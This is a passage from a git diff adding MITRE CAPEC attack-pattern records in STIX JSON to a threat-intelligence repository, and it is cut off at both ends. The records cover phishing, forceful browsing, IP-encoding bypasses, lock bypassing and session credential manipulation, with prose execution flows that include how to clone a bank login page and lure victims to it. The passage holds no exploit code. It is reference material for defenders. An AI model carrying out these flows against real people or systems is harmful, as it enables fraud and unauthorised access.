"attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Ensure that the algorithms are used properly. That means:\n \n 1. Not rolling out your own crypto; Use proven algorithms and implementations.\n 2. Choosing initialization vectors with sufficiently random numbers\n 3. Generating key material using good sources of randomness and avoiding known weak keys\n 4. Using proven protocols and their implementations.\n 5. Picking the most appropriate cryptographic algorithm for your usage context and data\n \n ", + "id": "course-of-action--bbfcad03-0664-4eee-863a-505d55ef851a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-97-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--487a11a7-57af-4eaa-b92b-3531374ad2d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbfcad03-0664-4eee-863a-505d55ef851a", + "target_ref": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can later be used by an attacker. 
Phishing is essentially a form of information gathering or \"fishing\" for information.", + "external_references": [ + { + "external_id": "CAPEC-98", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/98.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + }, + { + "description": "Phishing", + "external_id": "T1566", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566" + }, + { + "description": "Phishing for Information", + "external_id": "T1598", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598" + }, + { + "description": "Wireless Security - Bluejack a Victim, TutorialsPoint", + "external_id": "REF-656", + "source_name": "reference_from_CAPEC", + "url": "https://www.tutorialspoint.com/wireless_security/wireless_security_bluejack_a_victim.htm" + } + ], + "id": "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501" + ], + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ 
+ "The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An attacker has just collected the target's online banking information which can now be used by the attacker to log into the target's bank account and transfer money to a bank account of the attackers' choice.", + "An adversary may use BlueJacking, or Bluetooth Phishing to send unsolicited contact cards, messages, or pictures to nearby devices that are listening via Bluetooth. These messages may contain phishing content." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

  2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
    Optionally obtain a legitimate SSL certificate for the new domain name.
  3. Explore legitimate website and create duplicate: An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

  4. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look and feel, but contain completely new content.

Exploit

  1. Convince user to enter sensitive information on attacker's site.: An attacker sends an e-mail to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker's website) and log in. The key is to get the victim to believe that the e-mail is coming from a legitimate entity with which the victim does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.

  2. Techniques
    Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
    Place phishing link in post to online forum.
  3. Use stolen credentials to log into legitimate site: Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.

  4. Techniques
    Log in to the legitimate site using another user's supplied credentials
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "attack-pattern--614cd894-0aa6-4031-88e1-89bd7b6118bb", + "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0" + ], + "x_capec_prerequisites": [ + "An attacker needs to have a way to initiate contact with the victim. Typically that will happen through e-mail.", + "An attacker needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \"hooks\" to many potential victims.", + "An attacker needs to have a sufficiently compelling call to action to prompt the user to take action.", + "The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity." + ], + "x_capec_resources_required": [ + "Some web development tools to put up a fake website." + ], + "x_capec_skills_required": { + "Medium": "Basic knowledge about websites: obtaining them, designing and implementing them, etc." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c786816-7b0c-4fe7-b657-7e339aea5498", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8cee0cf-4567-40f0-a8d6-0b1d71c03c27", + "target_ref": "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-99", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/99.html" + } + ], + "id": "attack-pattern--28be41f9-7246-4484-869d-f0e2e82690ee", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: XML Parser Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json new file mode 100644 index 0000000000000000000000000000000000000000..a1b32a9158fc469fc061d92906dced69bf4dc859 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json 
@@ -0,0 +1,88 @@ +{ + "id": "bundle--d8d07399-8d5e-4b47-8eee-186f1a87f968", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.", + "external_references": [ + { + "external_id": "CAPEC-87", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/87.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Predictable Resource Location", + "external_id": "34", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Predictable-Resource-Location" + }, + { + "description": "Forced browsing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Forced_browsing" + } + ], + "id": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Forceful Browsing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ 
+ "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.\n An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Spider: Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.

  2. Techniques
    Use a spidering tool to follow and record all links.
    Use a proxy tool to record all links visited during a manual traversal of the web application.

Experiment

  1. Attempt well-known or guessable resource locations: Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.

  2. Techniques
    Use a spidering tool to follow and record attempts on well-known URLs.
    Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.

Exploit

  1. Use unauthorized resources: By visiting the unprotected resource, the attacker makes use of unauthorized functionality.

  2. Techniques
    Access unprotected functions and execute them.
  3. View unauthorized data: The attacker discovers and views unprotected sensitive data.

  4. Techniques
    Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The forcibly browseable pages or accessible resources must be discoverable and improperly protected." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement." + ], + "x_capec_skills_required": { + "Low": "Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json new file mode 100644 index 0000000000000000000000000000000000000000..7bd7df78ffb884bbb4599d53b90e752ddece2a16 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json 
@@ -0,0 +1,29 @@
+{
+ "id": "bundle--c754bc79-6b19-4553-890f-2d5d2094c606",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-409",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/409.html"
+ }
+ ],
+ "id": "attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1",
+ "modified": "2018-07-31T00:00:00.000Z",
+ "name": "DEPRECATED: Information Gathering from Non-Traditional Sources",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Meta",
+ "x_capec_status": "Deprecated",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json
new file mode 100644
index 0000000000000000000000000000000000000000..293de2136a5f8da44b6eea70262add96f63d017e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json
@@ -0,0 +1,45 @@
+{
+ "id": "bundle--4cbb2cf4-62ad-4b39-a187-1a51eb3c49d7",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-391",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/391.html"
+ },
+ {
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
+ "external_id": "REF-33",
+ "source_name": "reference_from_CAPEC"
+ }
+ ],
+ "id": "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97",
+ "modified": "2019-09-30T00:00:00.000Z",
+ "name": "Bypassing Physical Locks",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_child_of_refs": [
+ "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f"
+ ],
+ "x_capec_domains": [
+ "Physical Security"
+ ],
+ "x_capec_parent_of_refs": [
+ "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a",
+ "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368",
+ "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494"
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json
new file mode 100644
index 0000000000000000000000000000000000000000..79e5c87a2f8edeccf6b02cc40d2ae0b61c1562ab
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json
@@ -0,0 +1,77 @@ +{ + "id": "bundle--3b03ad83-4551-41c0-b6cf-00c2067245f0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on the adversary using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.", + "external_references": [ + { + "external_id": "CAPEC-4", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/4.html" + }, + { + "external_id": "CWE-291", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/291.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Using Alternative IP Address Encodings", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for IP addresses as user input: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application where IP addresses are used.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts alternate IP address encodings, observing application behavior. The adversary will also attempt to access the application through an alternate IP address encoding to see if access control changes

  2. Techniques
    Instead of using a URL, use the IP address that the URL resolves to
    Specify a port directly to a URL input
    Omit or add \"http://\" or \"https://\" to a URL to see if the application behaves differently

Exploit

  1. Bypass access control: Using an alternate IP address encoding, the adversary will either access the application or give the alternate encoding as input, bypassing access control restrictions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target software must fail to anticipate all of the possible valid encodings of an IP/web address.", + "The adversary must have the ability to communicate with the server." + ], + "x_capec_resources_required": [ + "The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities." + ], + "x_capec_skills_required": { + "Low": "The adversary has only to try IP address format combinations." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json new file mode 100644 index 0000000000000000000000000000000000000000..263aba177e6ba296434db02a29c56da8ca3ab24a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json 
@@ -0,0 +1,47 @@
+{
+ "id": "bundle--49e344c8-bee0-4a63-b79d-e302b8ed36ce",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-185",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/185.html"
+ },
+ {
+ "external_id": "CWE-494",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/494.html"
+ }
+ ],
+ "id": "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "Malicious Software Download",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_can_follow_refs": [
+ "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b"
+ ],
+ "x_capec_can_precede_refs": [
+ "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862"
+ ],
+ "x_capec_child_of_refs": [
+ "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1"
+ ],
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "Very High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json
new file mode 100644
index 0000000000000000000000000000000000000000..223f3d56c0750896f891bef403069785b163c08c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json
@@ -0,0 +1,53 @@ +{ + "id": "bundle--7bd63075-1170-4cbb-8e3b-0bbc89944ea2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server.", + "external_references": [ + { + "external_id": "CAPEC-226", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Session Credential Falsification through Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. 
This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.\n ", + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users." + ], + "x_capec_resources_required": [ + "An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json new file mode 100644 index 0000000000000000000000000000000000000000..e56bb97b51d381d3dbc643171627cf270c2d8628 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json 
@@ -0,0 +1,47 @@ +{ + "id": "bundle--1af1c6ae-682c-4e2c-b5a3-346b6263fb1a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.", + "external_references": [ + { + "external_id": "CAPEC-208", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/208.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations." 
+ ], + "x_capec_resources_required": [ + "The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json new file mode 100644 index 0000000000000000000000000000000000000000..43e25ecf4ed4347e3074823021f0db843691ace9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json 
@@ -0,0 +1,70 @@ +{ + "id": "bundle--41285adb-a292-45e0-bfdb-7e929a3024ef", + "objects": [ + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.", + "external_references": [ + { + "external_id": "CAPEC-587", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/587.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Cross Frame Scripting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Frame_Scripting" + }, + { + "description": "Cross Frame Scripting, 2016, OWASP", + "external_id": "REF-469", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Cross_Frame_Scripting" + }, + { + "description": "Gustave Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson, Busting Frame Busting: a Study of Clickjacking Vulnerabilities on 